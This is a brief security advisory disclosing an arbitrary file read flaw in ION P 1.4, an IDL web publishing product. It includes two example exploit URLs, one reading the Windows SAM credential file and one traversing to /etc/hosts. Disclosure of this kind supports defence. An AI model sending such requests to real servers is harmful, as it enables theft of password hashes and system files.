|
|
| |
| ION, IDL On the Net, is a family of products that allows you to publish interactive IDL applications over a networked environment. A security vulnerability allows remote attackers to read arbitrary files. |
| |
Credit:
The information has been provided by Stuart Moore and Zero-X www.lobnan.de Team.
|
| |
Vulnerable systems:
* ION P version 1.4 (2001/03/22)
Example:
http://www.Server.com/cgi-bin/ion-p.exe?page=c:\winnt\repair\sam
http://www.Server.com/cgi-bin/ion-p?page=../../../../../etc/hosts
|
|
|
|
|
|
|
|